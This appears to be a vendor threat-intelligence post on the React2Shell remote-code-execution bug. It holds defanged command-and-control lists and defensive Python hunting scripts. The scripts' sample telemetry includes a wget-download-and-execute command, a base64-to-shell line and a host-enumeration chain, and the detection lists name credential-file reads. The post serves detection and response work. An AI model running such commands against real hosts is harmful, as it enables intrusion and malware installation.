Fortra Intelligence and Research Experts (FIRE) declared CVE-2025-55182, a remote code execution vulnerability in React Server Components dubbed React2Shell, an emerging threat on December 3, 2025.
As usual, researchers evaluated existing detection content against known indicators of attack and compromise and created new content where needed. This was particularly challenging given the high volume of publicly available proof-of-concept exploits (PoCs), many of which turned out not to work when tested against vulnerable software versions. Attackers are launching these non-functional PoCs as well, producing a high volume of noisy but benign exploitation attempts for our threat hunters to sift through.
On December 5, Fortra threat hunters identified multiple instances of compromise linked to React servers. This supports an early report from the AWS Security Blog, and subsequent reports from others, of rapid and mass exploitation of the bug. Hunts were escalated as incidents and contained while remediation actions were planned and implemented.
Because the volume of false PoCs makes high-fidelity detection content difficult to build, this blog analyzes two exploit strings that have triggered successful code execution and shares a list of command-and-control IPs and URIs captured in exploit payloads, to support others in identifying and investigating potential React2Shell compromises.
React2Shell Exploits & Vulnerable Responses
We have observed two main exploitation variants that show signs of successful exploitation. The first exploit string is a request of the following form, where `res` is the variable returned in an `a` parameter in a header, carrying the output of the command:
Vulnerable servers returned a 303 status response, with the output of the executed command returned in the `x-action-redirect` header:
The second common exploit string is very similar, but places the `res` variable within the digest portion and removes the redirect step:
In this case, vulnerable servers respond with a 500 status code, with the output of the command appearing in the `E{"digest":"<res>"}` object:
The security content that captured exploit attempts was largely informed by open-source intelligence from Searchlight Cyber and adapted for Fortra security solutions.
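The two response shapes described above can be turned into a triage rule that separates confirmed code execution from the noise of failed PoCs. The following Python example is added here and is not Fortra's detection content. The sample request and responses are constructed: only the arithmetic test string from the request is reproduced, not the exploit framing, and the service-account names used in the output heuristics are assumptions.

```python
import re
from typing import Dict, Optional, Tuple

# Regexes for the two return channels described in the post.
DIGEST_RE = re.compile(r'E\{"digest":"((?:[^"\\]|\\.)*)"')   # E{"digest":"<res>"} row in a 500 body
PRODUCT_RE = re.compile(r"(\d{3,})\*(\d{3,})")                # arithmetic RCE test such as 40302*41082
OUTPUT_HINTS = (                                              # shapes of post-compromise command output
    re.compile(r"\buid=\d+\("),                      # id
    re.compile(r"^Linux \S+ \d"),                    # uname -a
    re.compile(r"^(root|www-data|node|nextjs)$"),    # whoami; account names are assumed
    re.compile(r"nameserver \d+\.\d+\.\d+\.\d+"),    # cat /etc/resolv.conf
)


def parse_response(raw: str) -> Tuple[int, Dict[str, str], str]:
    """Split a raw HTTP/1.1 response into (status, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def extract_returned_value(raw: str) -> Optional[Tuple[str, str]]:
    """Return (variant, value) if the response carries data through either channel."""
    status, headers, body = parse_response(raw)
    if status == 303 and headers.get("x-action-redirect"):
        return "303/x-action-redirect", headers["x-action-redirect"]
    if status == 500:
        m = DIGEST_RE.search(body)
        if m:
            return "500/digest", m.group(1)
    return None


def product_echoed(request_text: str, value: str) -> bool:
    """True if the request contains A*B and the returned value is exactly A*B."""
    m = PRODUCT_RE.search(request_text)
    return bool(m) and value.strip() == str(int(m.group(1)) * int(m.group(2)))


def classify(request_text: str, raw_response: str) -> Dict[str, Optional[str]]:
    """Grade one request/response pair; only the value carried back distinguishes exploitation."""
    found = extract_returned_value(raw_response)
    if found is None:
        return {"verdict": "no-return-channel", "variant": None, "value": None}
    variant, value = found
    if product_echoed(request_text, value):
        verdict = "confirmed-rce"      # server evaluated attacker-supplied arithmetic
    elif any(p.search(value) for p in OUTPUT_HINTS):
        verdict = "likely-rce"         # value looks like shell command output
    else:
        verdict = "inconclusive"       # ordinary redirect target or a genuine error digest
    return {"verdict": verdict, "variant": variant, "value": value}


# Constructed samples (not captured traffic). The request shows only the arithmetic test.
REQ_ARITH = "...40302*41082..."
RESP_303_RCE = "HTTP/1.1 303 See Other\r\nx-action-redirect: 1655686764\r\nContent-Length: 0\r\n\r\n"
RESP_500_RCE = ("HTTP/1.1 500 Internal Server Error\r\nContent-Type: text/x-component\r\n\r\n"
                '0:E{"digest":"uid=1000(node) gid=1000(node) groups=1000(node)"}\n')
RESP_303_BENIGN = "HTTP/1.1 303 See Other\r\nx-action-redirect: /dashboard\r\n\r\n"
RESP_500_BENIGN = 'HTTP/1.1 500 Internal Server Error\r\n\r\n0:E{"digest":"2857048195"}\n'

if __name__ == "__main__":
    for req, resp in ((REQ_ARITH, RESP_303_RCE), ("", RESP_500_RCE),
                      ("", RESP_303_BENIGN), (REQ_ARITH, RESP_500_BENIGN)):
        print(classify(req, resp))
```

Both shapes also occur on healthy servers: a server action that redirects answers 303 with `x-action-redirect`, and a production error answers 500 with a numeric digest. Correlating the request's `A*B` with the returned product is the strongest signal; command-output heuristics are a weaker second tier, and a bare 303 or 500 on its own is only a lead.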
The top 20 IP addresses observed triggering React2Shell IDS content since the emerging threat was declared are as follows:
Post-compromise Indicators
In the instances of compromise, threat actors used the exploit to run several types of commands on the victim hosts. The most common were basic commands to test code execution, such as multiplying two integers together (`40302*41082`), where the result is returned in the response, or a `whoami` command, which returns the username. We also observed base64-encoded and plaintext commands used for more complex enumeration, such as the chained command `uname -a ; id ;hostname -I ; ls -la / ; ls -la ~ ;cat /etc/hosts;cat /etc/resolv.conf` to extract a large volume of environment information, followed by outbound wget requests from the victim host that pulled single-character-named files from a malicious dropper host.
FIRE has collected the IPs and URIs of command-and-control locations seen in React2Shell exploit attempts. We are sharing these sanitized (defanged) artifacts and encourage security teams to check for any outbound connections to these locations. This will support hunting for compromise stemming from the React2Shell vulnerability as well as from other initial access methods.
Because exploitation attempts are so numerous, detecting post-compromise activity is the more reliable way to limit noisy false positives.
React2Shell CnC URIs observed:
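The post-compromise commands described above are easier to hunt on the host than in the flood of HTTP attempts. As an added example that is not Fortra's detection content, the Python below scores constructed process-creation events for a shell spawned by the Node.js server process that runs a bare `whoami`, the enumeration chain, a `wget` download, or a base64-staged command (decoded and re-scanned). The event field names, the parent process names, and the TEST-NET dropper address are assumptions.

```python
import base64
import re
from typing import Dict, List

SHELLS = ("sh", "bash", "dash", "zsh")
NODE_PARENTS = ("node", "next-server", "npm", "bun")   # assumed process names; adjust to your telemetry
RECON_TOKENS = ("uname -a", "id", "whoami", "hostname -I", "ls -la /", "ls -la ~",
                "cat /etc/hosts", "cat /etc/resolv.conf", "cat /etc/passwd")
URL_RE = re.compile(r"\b(?:wget|curl)\b[^;|&]*?(https?://[^\s'\"]+)")
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def strip_shell_wrapper(cmdline: str) -> str:
    """'sh -c \"whoami\"' -> 'whoami' so the inner command can be scored."""
    m = re.match(r"^\S+\s+-c\s+(.*)$", cmdline.strip())
    cmd = m.group(1) if m else cmdline.strip()
    return cmd.strip("'\"")


def decode_b64_stages(cmd: str) -> List[str]:
    """If the command pipes through base64 -d, decode every base64-looking token."""
    if "base64 -d" not in cmd and "base64 --decode" not in cmd:
        return []
    stages = []
    for tok in B64_RE.findall(cmd):
        try:
            stages.append(base64.b64decode(tok, validate=True).decode("utf-8", "replace"))
        except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
            pass
    return stages


def recon_hits(text: str) -> List[str]:
    """Distinct enumeration commands found in ;-, |-, &-separated segments."""
    hits: List[str] = []
    for seg in re.split(r"[;|&\n]+", text):
        seg = seg.strip().strip("() ")
        for t in RECON_TOKENS:
            if (seg == t or seg.startswith(t + " ")) and t not in hits:
                hits.append(t)
    return hits


def analyse_command(cmdline: str) -> Dict[str, object]:
    cmd = strip_shell_wrapper(cmdline)
    stages = decode_b64_stages(cmd)
    text = "\n".join([cmd] + stages)          # score the decoded stage too
    tags: List[str] = []
    if stages:
        tags.append("base64-staged")
    hits = recon_hits(text)
    if cmd in ("whoami", "id"):
        tags.append("rce-test")               # bare execution test seen in the intrusions
    elif len(hits) >= 3:
        tags.append("recon-chain")            # multi-command environment enumeration
    urls = URL_RE.findall(text)
    if urls:
        tags.append("dropper-fetch")          # outbound wget/curl of a payload
    return {"tags": tags, "recon": hits, "urls": urls}


def hunt(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Flag only shells whose parent is the application server process."""
    findings = []
    for ev in events:
        if ev["parent_image"] not in NODE_PARENTS or ev["image"] not in SHELLS:
            continue
        result = analyse_command(str(ev["cmdline"]))
        if result["tags"]:
            findings.append({"pid": ev["pid"], **result})
    return findings


def findings_by_pid(events: List[Dict[str, object]]) -> Dict[int, List[str]]:
    return {int(f["pid"]): list(f["tags"]) for f in hunt(events)}


# Constructed telemetry; the staged payload is the post's enumeration chain, base64-encoded here.
CHAIN = "uname -a ; id ;hostname -I ; ls -la / ; ls -la ~ ;cat /etc/hosts;cat /etc/resolv.conf"
STAGED = base64.b64encode(CHAIN.encode()).decode()
SAMPLE_EVENTS = [
    {"pid": 101, "parent_image": "node", "image": "sh", "cmdline": "sh -c whoami"},
    {"pid": 102, "parent_image": "node", "image": "sh", "cmdline": f"sh -c '{CHAIN}'"},
    {"pid": 103, "parent_image": "node", "image": "sh",
     "cmdline": "sh -c 'wget http://203.0.113.10/x -O /tmp/x; chmod +x /tmp/x; /tmp/x'"},
    {"pid": 104, "parent_image": "node", "image": "sh", "cmdline": f"sh -c 'echo {STAGED} | base64 -d | sh'"},
    {"pid": 105, "parent_image": "node", "image": "sh", "cmdline": "sh -c 'git rev-parse HEAD'"},   # benign
    {"pid": 106, "parent_image": "cron", "image": "sh", "cmdline": "sh -c 'uname -a ; id ; cat /etc/hosts'"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f)
```

Scoping to shells whose parent is the server process keeps scheduled enumeration (pid 106) and build-time `git` calls (pid 105) out of the results; the decoded stage is scored with the same rules as plaintext, so encoding buys the attacker nothing here.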
149[.]248[.]44[.]88/ddd
15[.]161[.]175[.]172:443
154[.]89[.]152[.]240/check[.]sh
172[.]93[.]220[.]237:9999/66[.]150[.]187[.]132
172[.]93[.]220[.]237:9999/donate[.]childcareministries[.]org
172[.]93[.]220[.]237:9999/donate[.]pastorpaul[.]net
172[.]93[.]220[.]237:9999/electrictelehandler[.]jlg[.]com
172[.]93[.]220[.]237:9999/electrictelehandler[.]jlg[.]prodsr[.]com
172[.]93[.]220[.]237:9999/hd-hyundaice[.]prodsr[.]com
172[.]93[.]220[.]237:9999/healthcare[.]swansonrussell[.]com
172[.]93[.]220[.]237:9999/healthcare[.]swansonrussell[.]prodsr[.]com
172[.]93[.]220[.]237:9999/kigo-web-wallet-test[.]kigodigital[.]net
172[.]93[.]220[.]237:9999/na[.]hd-hyundaice[.]com
172[.]93[.]220[.]237:9999/nidentistry[.]stagesr[.]com
172[.]93[.]220[.]237:9999/runza[.]devsr[.]com
172[.]93[.]220[.]237:9999/runza[.]prodsr[.]com
172[.]93[.]220[.]237:9999/shop[.]crown[.]org
172[.]93[.]220[.]237:9999/store[.]allenjackson[.]com
172[.]93[.]220[.]237:9999/store[.]awmi[.]net
172[.]93[.]220[.]237:9999/store[.]endtime[.]com
172[.]93[.]220[.]237:9999/store[.]ernestangley[.]ca
172[.]93[.]220[.]237:9999/store[.]ernestangley[.]org
172[.]93[.]220[.]237:9999/store[.]str[.]org
172[.]93[.]220[.]237:9999/store[.]thegracecathedral[.]org
172[.]93[.]220[.]237:9999/support[.]reasons[.]org
172[.]93[.]220[.]237:9999/swansonrussell[.]stagesr[.]com
172[.]93[.]220[.]237:9999/www[.]runza[.]com
43[.]156[.]137[.]45:8000/yyj
43[.]247[.]134[.]215:8998/nginx3
hxxp[:]//1[.]94[.]136[.]234:8084/slt
hxxp[:]//104[.]233[.]253[.]4:9090/update[.]sh
hxxp[:]//107[.]150[.]119[.]37:8085/slw
hxxp[:]//107[.]173[.]89[.]153:60051/slt
hxxp[:]//107[.]175[.]1[.]26:19092/slt
hxxp[:]//107[.]175[.]1[.]26:58087/slt
hxxp[:]//107[.]175[.]76[.]208:19999/linux_WDllqDGr1
hxxp[:]//107[.]175[.]76[.]208:4609/slt
hxxp[:]//107[.]175[.]76[.]208:9092/slt
hxxp[:]//108[.]61[.]217[.]22:80/upload
hxxp[:]//109[.]238[.]92[.]111/ch[.]sh
hxxp[:]//115[.]42[.]60[.]126:10089/slt
hxxp[:]//115[.]42[.]60[.]163:45523/slt
hxxp[:]//115[.]42[.]60[.]97:61160/slt
hxxp[:]//128[.]199[.]194[.]97:9001/setup2[.]sh
hxxp[:]//128[.]199[.]194[.]97:9002/setup2[.]sh
hxxp[:]//128[.]199[.]194[.]97:9003/setup2[.]sh
hxxp[:]//13[.]37[.]74[.]87
hxxp[:]//139[.]59[.]59[.]33:9001/setup2[.]sh
hxxp[:]//139[.]59[.]59[.]33:9002/setup2[.]sh
hxxp[:]//139[.]59[.]59[.]33:9003/setup2[.]sh
hxxp[:]//139[.]59[.]59[.]33:9004/setup2[.]sh
hxxp[:]//139[.]59[.]59[.]33:9005/setup2[.]sh
hxxp[:]//139[.]59[.]59[.]33:9006/setup2[.]sh
hxxp[:]//144[.]202[.]115[.]234:80/upload
hxxp[:]//149[.]248[.]44[.]88/ddd
hxxp[:]//149[.]28[.]224[.]90:80/upload
hxxp[:]//149[.]28[.]70[.]98:80/upload
hxxp[:]//154[.]94[.]239[.]69:7070/yjsc
hxxp[:]//158[.]94[.]209[.]210/bins/UnHAnaAW[.]x86
hxxp[:]//162[.]215[.]170[.]26:3000/sex[.]sh
hxxp[:]//162[.]215[.]170[.]26:8000/sex[.]sh
hxxp[:]//167[.]86[.]107[.]35:9999/muie[.]sh
hxxp[:]//172[.]236[.]52[.]146
hxxp[:]//172[.]237[.]55[.]180/c
hxxp[:]//172[.]245[.]79[.]16
hxxp[:]//176[.]117[.]107[.]1
hxxp[:]//176[.]117[.]107[.]154/bot
hxxp[:]//176[.]65[.]148[.]246/x
hxxp[:]//178[.]218[.]144[.]53:8000/funny[.]sh
hxxp[:]//18[.]170[.]164[.]174
hxxp[:]//18[.]211[.]232[.]182
hxxp[:]//18[.]235[.]135[.]157
hxxp[:]//185[.]14[.]92[.]152/nuts/bolts
hxxp[:]//185[.]14[.]92[.]152/nuts/x86
hxxp[:]//185[.]177[.]72[.]11:8001
hxxp[:]//185[.]177[.]72[.]8:8001
hxxp[:]//185[.]193[.]127[.]254/d/opi1G30i/exec[.]sh
hxxp[:]//185[.]196[.]10[.]247/kamd64
hxxp[:]//193[.]34[.]213[.]150/nuts/bolts
hxxp[:]//193[.]34[.]213[.]150/nuts/x86
hxxp[:]//194[.]246[.]84[.]13/slt
hxxp[:]//194[.]246[.]84[.]13:2033/linux_64[.]sh
hxxp[:]//194[.]246[.]84[.]13:2033/linux_64[.]sh/chain[.]sh
hxxp[:]//194[.]246[.]84[.]13:2045/slt
hxxp[:]//194[.]69[.]203[.]32:81/hiddenbink/react[.]sh
hxxp[:]//195[.]123[.]211[.]151:8080/d/opi1G30i/exec[.]sh
hxxp[:]//195[.]178[.]110[.]131:8001
hxxp[:]//196[.]251[.]100[.]191/update[.]sh
hxxp[:]//198[.]23[.]196[.]131:49953/slt
hxxp[:]//198[.]46[.]221[.]26:8989/crond
hxxp[:]//2[.]57[.]122[.]173:8001
hxxp[:]//204[.]76[.]203[.]40:1337/yankedLinux
hxxp[:]//207[.]148[.]79[.]178:6608/sys[.]sh
hxxp[:]//210[.]1[.]226[.]163:49934/server
hxxp[:]//213[.]21[.]239[.]39:8084/slt
hxxp[:]//213[.]21[.]239[.]39:8094/slt
hxxp[:]//216[.]158[.]232[.]43:12000/sex[.]sh
hxxp[:]//217[.]60[.]249[.]228:8000/stx[.]sh
hxxp[:]//23[.]132[.]164[.]54/bot
hxxp[:]//23[.]228[.]188[.]126/rondo[.]aqu[.]sh
hxxp[:]//23[.]235[.]188[.]3:653/get[.]sh
hxxp[:]//23[.]95[.]120[.]228:61111/slt
hxxp[:]//3[.]78[.]145[.]28
hxxp[:]//31[.]56[.]27[.]76/n2/x86
hxxp[:]//31[.]56[.]27[.]97/lula
hxxp[:]//31[.]56[.]27[.]97/scripts/4thepool_miner[.]sh
hxxp[:]//38[.]147[.]187[.]30/fecfXZX/1[.]sh
hxxp[:]//38[.]165[.]44[.]205/k
hxxp[:]//38[.]54[.]27[.]18/tmp[.]elf
hxxp[:]//39[.]97[.]229[.]220:8001/config1
hxxp[:]//41[.]231[.]37[.]153/rondo[.]aqu[.]sh
hxxp[:]//45[.]134[.]174[.]235:443/a1[.]sh
hxxp[:]//45[.]134[.]174[.]235:443/a2[.]sh
hxxp[:]//45[.]134[.]174[.]235:443/a3[.]sh
hxxp[:]//45[.]32[.]158[.]54/5e51aff54626ef7f/x86_64
hxxp[:]//45[.]76[.]155[.]14/vim
hxxp[:]//46[.]36[.]37[.]85:12000/sex[.]sh
hxxp[:]//47[.]243[.]29[.]225:8084/slt
hxxp[:]//47[.]84[.]113[.]198:8000/dev
hxxp[:]//47[.]84[.]98[.]53:18082/file/run
hxxp[:]//47[.]90[.]227[.]150/google_verify[.]php
hxxp[:]//5[.]199[.]174[.]1
hxxp[:]//5[.]199[.]174[.]151:80
hxxp[:]//5[.]199[.]174[.]151:8000/download/script[.]sh
hxxp[:]//51[.]145[.]122[.]82
hxxp[:]//51[.]91[.]77[.]94:13339/termite/51[.]91[.]77[.]94
hxxp[:]//54[.]78[.]196[.]249
hxxp[:]//64[.]176[.]63[.]130
hxxp[:]//64[.]49[.]251[.]61
hxxp[:]//66[.]154[.]106[.]246:9099/linux[.]sh
hxxp[:]//66[.]42[.]96[.]199:443/upload
hxxp[:]//67[.]215[.]229[.]176:9998/slt
hxxp[:]//82[.]196[.]224[.]106
hxxp[:]//84[.]247[.]176[.]139/system[.]js
hxxp[:]//89[.]144[.]31[.]18/nuts/bolts
hxxp[:]//89[.]144[.]31[.]18/nuts/boltsc
hxxp[:]//89[.]144[.]31[.]18/nuts/x86
hxxp[:]//91[.]108[.]243[.]251:9999/muie[.]sh
hxxp[:]//92[.]246[.]87[.]48:5000/download/sex[.]sh
hxxp[:]//93[.]123[.]109[.]173:8001
hxxp[:]//93[.]123[.]109[.]247:8000
hxxp[:]//93[.]123[.]109[.]247:8001
hxxp[:]//95[.]138[.]138[.]166
hxxps[:]//100[.]21[.]71[.]208
hxxps[:]//13[.]235[.]158[.]164:9443/authenticationendpoint/watchdog_config
hxxps[:]//15[.]156[.]132[.]101
hxxps[:]//18[.]224[.]216[.]230
hxxps[:]//3[.]33[.]251[.]24
hxxps[:]//34[.]196[.]149[.]252
hxxps[:]//52[.]43[.]180[.]78
hxxps[:]//52[.]43[.]68[.]93
React2Shell CnC IPs observed:
1[.]94[.]136[.]234
100[.]21[.]71[.]208
104[.]233[.]253[.]4
107[.]150[.]119[.]37
107[.]173[.]89[.]153
107[.]175[.]1[.]26
107[.]175[.]76[.]208
108[.]61[.]217[.]22
109[.]238[.]92[.]111
115[.]42[.]60[.]126
115[.]42[.]60[.]163
115[.]42[.]60[.]97
128[.]199[.]194[.]97
13[.]235[.]158[.]164
13[.]37[.]74[.]87
139[.]59[.]59[.]33
144[.]202[.]115[.]234
149[.]248[.]44[.]88
149[.]28[.]224[.]90
149[.]28[.]70[.]98
15[.]156[.]132[.]101
15[.]161[.]175[.]172
15[.]164[.]26[.]211
154[.]89[.]152[.]240
154[.]94[.]239[.]69
158[.]94[.]209[.]210
162[.]13[.]106[.]151
162[.]13[.]244[.]72
162[.]215[.]170[.]26
167[.]86[.]107[.]35
172[.]236[.]52[.]146
172[.]237[.]55[.]180
172[.]245[.]79[.]16
172[.]93[.]220[.]237
176[.]117[.]107[.]1
176[.]117[.]107[.]154
176[.]65[.]148[.]246
178[.]218[.]144[.]53
18[.]170[.]164[.]174
18[.]189[.]42[.]179
18[.]211[.]232[.]182
18[.]224[.]216[.]230
18[.]224[.]99[.]66
18[.]235[.]135[.]157
185[.]14[.]92[.]152
185[.]177[.]72[.]11
185[.]177[.]72[.]8
185[.]193[.]127[.]254
185[.]196[.]10[.]247
193[.]34[.]213[.]150
194[.]246[.]84[.]13
194[.]69[.]203[.]32
195[.]123[.]211[.]151
195[.]178[.]110[.]131
196[.]251[.]100[.]191
198[.]23[.]196[.]131
198[.]46[.]221[.]26
2[.]57[.]122[.]173
20[.]127[.]243[.]9
204[.]76[.]203[.]40
207[.]148[.]79[.]178
210[.]1[.]226[.]163
213[.]21[.]239[.]39
216[.]158[.]232[.]43
217[.]60[.]249[.]228
23[.]132[.]164[.]54
23[.]228[.]188[.]126
23[.]235[.]188[.]3
23[.]95[.]120[.]228
3[.]138[.]152[.]124
3[.]223[.]120[.]16
3[.]229[.]150[.]13
3[.]33[.]251[.]24
3[.]78[.]145[.]28
3[.]83[.]76[.]64
31[.]56[.]27[.]76
31[.]56[.]27[.]97
34[.]196[.]149[.]252
34[.]218[.]176[.]239
35[.]152[.]38[.]1
38[.]147[.]187[.]30
38[.]165[.]44[.]205
38[.]54[.]27[.]18
39[.]97[.]229[.]220
41[.]231[.]37[.]153
43[.]156[.]137[.]45
43[.]247[.]134[.]215
44[.]199[.]9[.]236
44[.]213[.]4[.]180
45[.]134[.]174[.]235
45[.]32[.]158[.]54
45[.]76[.]155[.]14
46[.]36[.]37[.]85
47[.]243[.]29[.]225
47[.]84[.]113[.]198
47[.]84[.]98[.]53
47[.]90[.]227[.]150
5[.]199[.]174[.]1
5[.]199[.]174[.]151
51[.]145[.]122[.]82
51[.]91[.]77[.]94
52[.]43[.]180[.]78
52[.]43[.]68[.]93
52[.]45[.]22[.]121
52[.]7[.]247[.]134
54[.]193[.]125[.]94
54[.]78[.]196[.]249
64[.]176[.]63[.]130
64[.]49[.]251[.]61
66[.]150[.]187[.]132
66[.]154[.]106[.]246
66[.]42[.]96[.]199
67[.]215[.]229[.]176
82[.]196[.]224[.]106
84[.]247[.]176[.]139
89[.]144[.]31[.]18
91[.]108[.]243[.]251
92[.]246[.]87[.]48
93[.]123[.]109[.]173
93[.]123[.]109[.]247
95[.]138[.]138[.]166
98[.]90[.]179[.]188
23[.]226[.]71[.]197
23[.]226[.]71[.]200
23[.]226[.]71[.]209
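To act on the lists above, as an added example that is not Fortra's tooling: the Python below refangs a subset of the defanged indicators in memory, indexes them by exact URL, host:port and host, scans a constructed proxy-log excerpt for outbound connections, and writes matches back out defanged. The log format and the subset of indicators are assumptions; paste the full lists in practice.

```python
import re
from typing import Dict, List, Optional, Set, Tuple
from urllib.parse import urlsplit

# Subset of the defanged indicators listed above; the full lists go here in practice.
DEFANGED_IOCS = """
149[.]248[.]44[.]88/ddd
15[.]161[.]175[.]172:443
hxxp[:]//104[.]233[.]253[.]4:9090/update[.]sh
hxxps[:]//100[.]21[.]71[.]208
1[.]94[.]136[.]234
"""


def refang(ioc: str) -> str:
    """Turn the defanged form back into a parseable URL (in memory only)."""
    s = ioc.strip().replace("hxxps[:]//", "https://").replace("hxxp[:]//", "http://")
    s = s.replace("[:]", ":").replace("[.]", ".")
    return s if s.startswith(("http://", "https://")) else "http://" + s   # scheme assumed for bare entries


def defang(s: str) -> str:
    """Reverse of refang, for reporting findings safely."""
    s = re.sub(r"^http(s?)://", r"hxxp\1[:]//", s)
    return s.replace(".", "[.]")


class IocSet:
    """Indicators indexed at three levels of specificity."""

    def __init__(self, defanged_text: str) -> None:
        self.hosts: Set[str] = set()
        self.hostports: Set[Tuple[str, int]] = set()
        self.urls: Set[Tuple[str, Optional[int], str]] = set()
        for line in defanged_text.splitlines():
            if not line.strip():
                continue
            p = urlsplit(refang(line))
            host = p.hostname or ""
            self.hosts.add(host)
            if p.port:
                self.hostports.add((host, p.port))
            if p.path and p.path != "/":
                self.urls.add((host, p.port, p.path))

    def match(self, dst_host: str, dst_port: Optional[int] = None, url: Optional[str] = None) -> Optional[str]:
        """Strongest match first: exact URL, then host:port, then host alone."""
        if url:
            p = urlsplit(url)
            if (p.hostname, p.port, p.path) in self.urls:
                return "url-match"
        if dst_port is not None and (dst_host, dst_port) in self.hostports:
            return "hostport-match"
        if dst_host in self.hosts:
            return "host-match"
        return None


# Constructed proxy log excerpt: timestamp, source, method, target, status.
SAMPLE_PROXY_LOG = """\
2025-12-05T10:12:01Z 10.0.4.17 GET http://104.233.253.4:9090/update.sh 200
2025-12-05T10:12:09Z 10.0.4.17 GET http://149.248.44.88/ddd 200
2025-12-05T10:15:30Z 10.0.4.22 GET https://registry.npmjs.org/react 200
2025-12-05T10:16:02Z 10.0.4.17 CONNECT 15.161.175.172:443 200
2025-12-05T10:17:45Z 10.0.4.31 GET http://1.94.136.234/ 404
"""


def scan_proxy_log(text: str, iocs: IocSet) -> List[Dict[str, str]]:
    hits = []
    for line in text.splitlines():
        ts, src, method, target, _status = line.split()
        if method == "CONNECT":                       # TLS tunnel: only host:port is visible
            host, _, port = target.rpartition(":")
            verdict = iocs.match(host, int(port))
        else:
            p = urlsplit(target)
            verdict = iocs.match(p.hostname or "", p.port, target)
        if verdict:
            hits.append({"ts": ts, "src": src, "target": defang(target), "verdict": verdict})
    return hits


if __name__ == "__main__":
    for h in scan_proxy_log(SAMPLE_PROXY_LOG, IocSet(DEFANGED_IOCS)):
        print(h)
```

Exact URL matches are the highest-confidence leads. Host-only matches on addresses inside cloud provider ranges (several of the listed IPs sit in such ranges) should be correlated with host-level evidence before being treated as compromise, because those addresses are reassigned over time.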
The Fortra SOC continues to work with impacted organizations during their incident response processes and has also identified and escalated instances of suspected vulnerability where certain 500 responses were observed from React servers.
FIRE will continue to monitor active React2Shell (CVE-2025-55182) campaigns and will disclose further information that may support the threat intelligence community when it is responsible to do so. For more information on the React2Shell emerging threat, see React Server Component Remote Code Execution Vulnerability.